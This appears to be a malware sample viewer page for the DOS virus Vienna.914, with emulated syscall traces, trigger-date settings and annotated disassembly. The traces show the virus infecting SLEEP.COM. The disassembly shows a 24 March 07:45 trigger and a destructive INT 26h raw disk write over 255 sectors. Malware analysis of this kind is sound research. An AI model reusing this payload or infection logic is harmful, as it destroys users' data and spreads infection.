Sample viewer

vx.netlux.org/Virus.DOS.Vienna.914

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:09:38.782815841Z 255 PC: 12a49 | UNKNOWN!
2018-12-17T23:09:38.785392772Z 48 PC: 12a69 | Get DOS version
2018-12-17T23:09:38.788410391Z 44 PC: 12a75 | Get time
0x12a75: xor bx, bx
; Window of 16-bit real-mode disassembly (Intel syntax) that starts right after
; INT 21h AH=2Ch (Get time) returns; its first instruction, xor bx, bx, sits on
; the preceding trace row. The code prints an encoded message when the
; hundredths field is small, then begins a date/time trigger check. The window
; is cut off after the second Get time call. si is set outside this window.
0x12a77: cmp dl, 4                          ; DL = hundredths of a second returned by Get time
0x12a7a: jle 0x12a7e                        ; DL <= 4 (signed compare): enter the print loop
0x12a7c: jmp 0x12a90                        ; otherwise go straight to the date check
0x12a7e: mov dl, byte ptr [bx + si + 0x8f]  ; next encoded byte of the string at si+0x8f, indexed by bx
0x12a82: or dl, dl                          ; sets ZF when the byte is zero
0x12a84: je 0x12a90                         ; a zero byte terminates the string
0x12a86: sub dl, 0x4b                       ; decode: stored bytes are offset by 0x4b
0x12a89: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to standard output
0x12a8b: int 0x21
0x12a8d: inc bx                             ; advance to the next byte
0x12a8e: jmp 0x12a7e
0x12a90: mov ah, 0x2a                       ; INT 21h AH=2Ah: Get date (DH = month, DL = day)
0x12a92: int 0x21
0x12a94: cmp dh, 3                          ; month must be 3 (March)
0x12a97: jne 0x12ad9                        ; mismatch leaves the trigger path; target is outside this window
0x12a99: cmp dl, 0x18                       ; day must be 0x18 = 24
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c                       ; INT 21h AH=2Ch: Get time (CH = hour, CL = minute)
0x12aa0: int 0x21
2018-12-17T23:09:38.79131488Z 42 PC: 12a94 | Get date
0x12a94: cmp dh, 3
; Window of 16-bit real-mode disassembly (Intel syntax) that starts right after
; INT 21h AH=2Ah (Get date) returns; its first instruction, cmp dh, 3 (DH =
; month), sits on the preceding trace row. It shows the rest of the trigger
; check (24 March, 07:45) and the message loop that runs when every compare
; matches. The window is cut off at 0x12ac0. si is set outside this window.
0x12a97: jne 0x12ad9                        ; month is not 3: leave the trigger path (target outside this window)
0x12a99: cmp dl, 0x18                       ; DL = day of month; 0x18 = 24
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c                       ; INT 21h AH=2Ch: Get time (CH = hour, CL = minute)
0x12aa0: int 0x21
0x12aa2: cmp ch, 7                          ; hour must be 7
0x12aa5: jne 0x12ad9
0x12aa7: cmp cl, 0x2d                       ; minute must be 0x2d = 45
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx                         ; bx = 0: index into the second encoded string
0x12aae: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at si+0xf1
0x12ab2: or dl, dl                          ; sets ZF when the byte is zero
0x12ab4: je 0x12ac0                         ; a zero byte terminates the string
0x12ab6: sub dl, 0x4b                       ; decode: stored bytes are offset by 0x4b
0x12ab9: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to standard output
0x12abb: int 0x21
0x12abd: inc bx                             ; advance to the next byte
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0                          ; AL = 0; the instructions that consume it lie past the end of this window
2018-12-17T23:09:38.795324495Z 47 PC: 12ade | Get disk transfer address
2018-12-17T23:09:38.797395816Z 26 PC: 12aef | Set disk transfer address
2018-12-17T23:09:38.799155946Z 78 PC: 12b7d | Find first file
2018-12-17T23:09:38.807309013Z 67 PC: 12bba | Get or set file attributes
2018-12-17T23:09:38.814295562Z 67 PC: 12bcc | Get or set file attributes
2018-12-17T23:09:38.831803677Z 61 PC: 12bd8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:09:38.840782944Z 87 PC: 12be5 | Get or set file date and time
2018-12-17T23:09:38.84247939Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:09:38.849700113Z 66 PC: 12c0a | Move file pointer
2018-12-17T23:09:38.851601278Z 64 PC: 12c30 | Write file or device (Write 914 bytes on handle 5)
2018-12-17T23:09:38.8616318Z 66 PC: 12c41 | Move file pointer
2018-12-17T23:09:38.863303731Z 64 PC: 12c52 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:09:38.871318529Z 87 PC: 12c66 | Get or set file date and time
2018-12-17T23:09:38.87369558Z 62 PC: 12c6b | Close file
2018-12-17T23:09:38.882580264Z 67 PC: 12c7a | Get or set file attributes
2018-12-17T23:09:38.908578592Z 26 PC: 12c86 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16601,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:32.855754511Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:32.856902489Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:53:32.858001934Z 44 PC: 12a75 | Get time
0x12a75: xor bx, bx
; Window of 16-bit real-mode disassembly (Intel syntax) that starts right after
; INT 21h AH=2Ch (Get time) returns; its first instruction, xor bx, bx, sits on
; the preceding trace row. The code prints an encoded message when the
; hundredths field is small, then begins a date/time trigger check. The window
; is cut off after the second Get time call. si is set outside this window.
0x12a77: cmp dl, 4                          ; DL = hundredths of a second returned by Get time
0x12a7a: jle 0x12a7e                        ; DL <= 4 (signed compare): enter the print loop
0x12a7c: jmp 0x12a90                        ; otherwise go straight to the date check
0x12a7e: mov dl, byte ptr [bx + si + 0x8f]  ; next encoded byte of the string at si+0x8f, indexed by bx
0x12a82: or dl, dl                          ; sets ZF when the byte is zero
0x12a84: je 0x12a90                         ; a zero byte terminates the string
0x12a86: sub dl, 0x4b                       ; decode: stored bytes are offset by 0x4b
0x12a89: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to standard output
0x12a8b: int 0x21
0x12a8d: inc bx                             ; advance to the next byte
0x12a8e: jmp 0x12a7e
0x12a90: mov ah, 0x2a                       ; INT 21h AH=2Ah: Get date (DH = month, DL = day)
0x12a92: int 0x21
0x12a94: cmp dh, 3                          ; month must be 3 (March)
0x12a97: jne 0x12ad9                        ; mismatch leaves the trigger path; target is outside this window
0x12a99: cmp dl, 0x18                       ; day must be 0x18 = 24
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c                       ; INT 21h AH=2Ch: Get time (CH = hour, CL = minute)
0x12aa0: int 0x21
2018-12-25T12:53:32.860314019Z 42 PC: 12a94 | Get date
0x12a94: cmp dh, 3
; Window of 16-bit real-mode disassembly (Intel syntax) that starts right after
; INT 21h AH=2Ah (Get date) returns; its first instruction, cmp dh, 3 (DH =
; month), sits on the preceding trace row. It shows the rest of the trigger
; check (24 March, 07:45) and the message loop that runs when every compare
; matches. The window is cut off at 0x12ac0. si is set outside this window.
0x12a97: jne 0x12ad9                        ; month is not 3: leave the trigger path (target outside this window)
0x12a99: cmp dl, 0x18                       ; DL = day of month; 0x18 = 24
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c                       ; INT 21h AH=2Ch: Get time (CH = hour, CL = minute)
0x12aa0: int 0x21
0x12aa2: cmp ch, 7                          ; hour must be 7
0x12aa5: jne 0x12ad9
0x12aa7: cmp cl, 0x2d                       ; minute must be 0x2d = 45
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx                         ; bx = 0: index into the second encoded string
0x12aae: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at si+0xf1
0x12ab2: or dl, dl                          ; sets ZF when the byte is zero
0x12ab4: je 0x12ac0                         ; a zero byte terminates the string
0x12ab6: sub dl, 0x4b                       ; decode: stored bytes are offset by 0x4b
0x12ab9: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to standard output
0x12abb: int 0x21
0x12abd: inc bx                             ; advance to the next byte
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0                          ; AL = 0; the instructions that consume it lie past the end of this window
2018-12-25T12:53:32.862964037Z 47 PC: 12ade | Get disk transfer address
2018-12-25T12:53:32.864020419Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:53:32.86512824Z 78 PC: 12b7d | Find first file
2018-12-25T12:53:32.871711127Z 67 PC: 12bba | Get or set file attributes
2018-12-25T12:53:32.877820324Z 67 PC: 12bcc | Get or set file attributes
2018-12-25T12:53:33.012287928Z 61 PC: 12bd8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:33.019260308Z 87 PC: 12be5 | Get or set file date and time
2018-12-25T12:53:33.020553826Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:33.026723667Z 66 PC: 12c0a | Move file pointer
2018-12-25T12:53:33.028467075Z 64 PC: 12c30 | Write file or device (Write 914 bytes on handle 5)
2018-12-25T12:53:33.036791316Z 66 PC: 12c41 | Move file pointer
2018-12-25T12:53:33.038105307Z 64 PC: 12c52 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:33.045527379Z 87 PC: 12c66 | Get or set file date and time
2018-12-25T12:53:33.046925138Z 62 PC: 12c6b | Close file
2018-12-25T12:53:33.054510674Z 67 PC: 12c7a | Get or set file attributes
2018-12-25T12:53:33.064696115Z 26 PC: 12c86 | Set disk transfer address

{"DateBased":true,"Day":24,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16601,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:33.449407984Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:33.450650854Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:53:33.451679906Z 44 PC: 12a75 | Get time
0x12a75: xor bx, bx
; Window of 16-bit real-mode disassembly (Intel syntax) that starts right after
; INT 21h AH=2Ch (Get time) returns; its first instruction, xor bx, bx, sits on
; the preceding trace row. The code prints an encoded message when the
; hundredths field is small, then begins a date/time trigger check. The window
; is cut off after the second Get time call. si is set outside this window.
0x12a77: cmp dl, 4                          ; DL = hundredths of a second returned by Get time
0x12a7a: jle 0x12a7e                        ; DL <= 4 (signed compare): enter the print loop
0x12a7c: jmp 0x12a90                        ; otherwise go straight to the date check
0x12a7e: mov dl, byte ptr [bx + si + 0x8f]  ; next encoded byte of the string at si+0x8f, indexed by bx
0x12a82: or dl, dl                          ; sets ZF when the byte is zero
0x12a84: je 0x12a90                         ; a zero byte terminates the string
0x12a86: sub dl, 0x4b                       ; decode: stored bytes are offset by 0x4b
0x12a89: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to standard output
0x12a8b: int 0x21
0x12a8d: inc bx                             ; advance to the next byte
0x12a8e: jmp 0x12a7e
0x12a90: mov ah, 0x2a                       ; INT 21h AH=2Ah: Get date (DH = month, DL = day)
0x12a92: int 0x21
0x12a94: cmp dh, 3                          ; month must be 3 (March)
0x12a97: jne 0x12ad9                        ; mismatch leaves the trigger path; target is outside this window
0x12a99: cmp dl, 0x18                       ; day must be 0x18 = 24
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c                       ; INT 21h AH=2Ch: Get time (CH = hour, CL = minute)
0x12aa0: int 0x21
2018-12-25T12:53:33.453577837Z 42 PC: 12a94 | Get date
0x12a94: cmp dh, 3
; Window of 16-bit real-mode disassembly (Intel syntax) that starts right after
; INT 21h AH=2Ah (Get date) returns; its first instruction, cmp dh, 3 (DH =
; month), sits on the preceding trace row. It shows the rest of the trigger
; check (24 March, 07:45) and the message loop that runs when every compare
; matches. The window is cut off at 0x12ac0. si is set outside this window.
0x12a97: jne 0x12ad9                        ; month is not 3: leave the trigger path (target outside this window)
0x12a99: cmp dl, 0x18                       ; DL = day of month; 0x18 = 24
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c                       ; INT 21h AH=2Ch: Get time (CH = hour, CL = minute)
0x12aa0: int 0x21
0x12aa2: cmp ch, 7                          ; hour must be 7
0x12aa5: jne 0x12ad9
0x12aa7: cmp cl, 0x2d                       ; minute must be 0x2d = 45
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx                         ; bx = 0: index into the second encoded string
0x12aae: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at si+0xf1
0x12ab2: or dl, dl                          ; sets ZF when the byte is zero
0x12ab4: je 0x12ac0                         ; a zero byte terminates the string
0x12ab6: sub dl, 0x4b                       ; decode: stored bytes are offset by 0x4b
0x12ab9: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to standard output
0x12abb: int 0x21
0x12abd: inc bx                             ; advance to the next byte
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0                          ; AL = 0; the instructions that consume it lie past the end of this window
2018-12-25T12:53:33.462876701Z 44 PC: 12aa2 | Get time
0x12aa2: cmp ch, 7
; Window of 16-bit real-mode disassembly (Intel syntax) that starts right after
; the second INT 21h AH=2Ch (Get time) returns; its first instruction,
; cmp ch, 7 (CH = hour), sits on the preceding trace row. This call is only
; reached after the month and day compares at 0x12a94 and 0x12a99 both matched.
; The window shows the minute check, the second message loop and the start of
; the payload: an INT 26h absolute disk write, which writes raw sectors and
; bypasses the file system. The window is cut off at 0x12acf; si and ds are
; set outside it.
0x12aa5: jne 0x12ad9                        ; hour is not 7: leave the trigger path (target outside this window)
0x12aa7: cmp cl, 0x2d                       ; CL = minute; 0x2d = 45
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx                         ; bx = 0: index into the second encoded string
0x12aae: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at si+0xf1
0x12ab2: or dl, dl                          ; sets ZF when the byte is zero
0x12ab4: je 0x12ac0                         ; a zero byte terminates the string
0x12ab6: sub dl, 0x4b                       ; decode: stored bytes are offset by 0x4b
0x12ab9: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to standard output
0x12abb: int 0x21
0x12abd: inc bx                             ; advance to the next byte
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0                          ; AL = drive number for INT 26h; 0 = drive A:
0x12ac2: mov cx, 0xff                       ; CX = number of sectors to write: 255
0x12ac5: mov dx, 1                          ; DX = first logical sector: 1
0x12ac8: int 0x26                           ; DOS absolute disk write; buffer is DS:BX, bx being the index left by the loop above
0x12aca: jb 0x12acf                         ; carry set (error reported): jump past the stack adjustment
0x12acc: add sp, 2                          ; INT 26h returns with the flags word still on the stack; discard it
0x12acf: inc al                             ; next drive number; presumably part of a per-drive loop, continuation not shown
2018-12-25T12:53:33.464868222Z 47 PC: 12ade | Get disk transfer address
2018-12-25T12:53:33.465777193Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:53:33.466972591Z 78 PC: 12b7d | Find first file
2018-12-25T12:53:33.472864998Z 67 PC: 12bba | Get or set file attributes
2018-12-25T12:53:33.478137597Z 67 PC: 12bcc | Get or set file attributes
2018-12-25T12:53:33.495031013Z 61 PC: 12bd8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:33.50143456Z 87 PC: 12be5 | Get or set file date and time
2018-12-25T12:53:33.502704197Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:33.508752429Z 66 PC: 12c0a | Move file pointer
2018-12-25T12:53:33.510443039Z 64 PC: 12c30 | Write file or device (Write 914 bytes on handle 5)
2018-12-25T12:53:33.518544852Z 66 PC: 12c41 | Move file pointer
2018-12-25T12:53:33.51973424Z 64 PC: 12c52 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:33.526710412Z 87 PC: 12c66 | Get or set file date and time
2018-12-25T12:53:33.528079251Z 62 PC: 12c6b | Close file
2018-12-25T12:53:33.535340196Z 67 PC: 12c7a | Get or set file attributes
2018-12-25T12:53:33.545264325Z 26 PC: 12c86 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16601,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:33.681911069Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:33.687282356Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:53:33.688461538Z 44 PC: 12a75 | Get time
0x12a75: xor bx, bx
; Window of 16-bit real-mode disassembly (Intel syntax) that starts right after
; INT 21h AH=2Ch (Get time) returns; its first instruction, xor bx, bx, sits on
; the preceding trace row. The code prints an encoded message when the
; hundredths field is small, then begins a date/time trigger check. The window
; is cut off after the second Get time call. si is set outside this window.
0x12a77: cmp dl, 4                          ; DL = hundredths of a second returned by Get time
0x12a7a: jle 0x12a7e                        ; DL <= 4 (signed compare): enter the print loop
0x12a7c: jmp 0x12a90                        ; otherwise go straight to the date check
0x12a7e: mov dl, byte ptr [bx + si + 0x8f]  ; next encoded byte of the string at si+0x8f, indexed by bx
0x12a82: or dl, dl                          ; sets ZF when the byte is zero
0x12a84: je 0x12a90                         ; a zero byte terminates the string
0x12a86: sub dl, 0x4b                       ; decode: stored bytes are offset by 0x4b
0x12a89: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to standard output
0x12a8b: int 0x21
0x12a8d: inc bx                             ; advance to the next byte
0x12a8e: jmp 0x12a7e
0x12a90: mov ah, 0x2a                       ; INT 21h AH=2Ah: Get date (DH = month, DL = day)
0x12a92: int 0x21
0x12a94: cmp dh, 3                          ; month must be 3 (March)
0x12a97: jne 0x12ad9                        ; mismatch leaves the trigger path; target is outside this window
0x12a99: cmp dl, 0x18                       ; day must be 0x18 = 24
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c                       ; INT 21h AH=2Ch: Get time (CH = hour, CL = minute)
0x12aa0: int 0x21
2018-12-25T12:53:33.690507903Z 42 PC: 12a94 | Get date
0x12a94: cmp dh, 3
; Window of 16-bit real-mode disassembly (Intel syntax) that starts right after
; INT 21h AH=2Ah (Get date) returns; its first instruction, cmp dh, 3 (DH =
; month), sits on the preceding trace row. It shows the rest of the trigger
; check (24 March, 07:45) and the message loop that runs when every compare
; matches. The window is cut off at 0x12ac0. si is set outside this window.
0x12a97: jne 0x12ad9                        ; month is not 3: leave the trigger path (target outside this window)
0x12a99: cmp dl, 0x18                       ; DL = day of month; 0x18 = 24
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c                       ; INT 21h AH=2Ch: Get time (CH = hour, CL = minute)
0x12aa0: int 0x21
0x12aa2: cmp ch, 7                          ; hour must be 7
0x12aa5: jne 0x12ad9
0x12aa7: cmp cl, 0x2d                       ; minute must be 0x2d = 45
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx                         ; bx = 0: index into the second encoded string
0x12aae: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at si+0xf1
0x12ab2: or dl, dl                          ; sets ZF when the byte is zero
0x12ab4: je 0x12ac0                         ; a zero byte terminates the string
0x12ab6: sub dl, 0x4b                       ; decode: stored bytes are offset by 0x4b
0x12ab9: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to standard output
0x12abb: int 0x21
0x12abd: inc bx                             ; advance to the next byte
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0                          ; AL = 0; the instructions that consume it lie past the end of this window
2018-12-25T12:53:33.692970336Z 47 PC: 12ade | Get disk transfer address
2018-12-25T12:53:33.694284891Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:53:33.695313264Z 78 PC: 12b7d | Find first file
2018-12-25T12:53:33.702093627Z 67 PC: 12bba | Get or set file attributes
2018-12-25T12:53:33.709710899Z 67 PC: 12bcc | Get or set file attributes
2018-12-25T12:53:33.724997694Z 61 PC: 12bd8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:33.729471972Z 87 PC: 12be5 | Get or set file date and time
2018-12-25T12:53:33.736522049Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:33.743475838Z 66 PC: 12c0a | Move file pointer
2018-12-25T12:53:33.744885853Z 64 PC: 12c30 | Write file or device (Write 914 bytes on handle 5)
2018-12-25T12:53:33.755045841Z 66 PC: 12c41 | Move file pointer
2018-12-25T12:53:33.757856845Z 64 PC: 12c52 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:33.765967862Z 87 PC: 12c66 | Get or set file date and time
2018-12-25T12:53:33.768136427Z 62 PC: 12c6b | Close file
2018-12-25T12:53:33.777228504Z 67 PC: 12c7a | Get or set file attributes
2018-12-25T12:53:33.788606857Z 26 PC: 12c86 | Set disk transfer address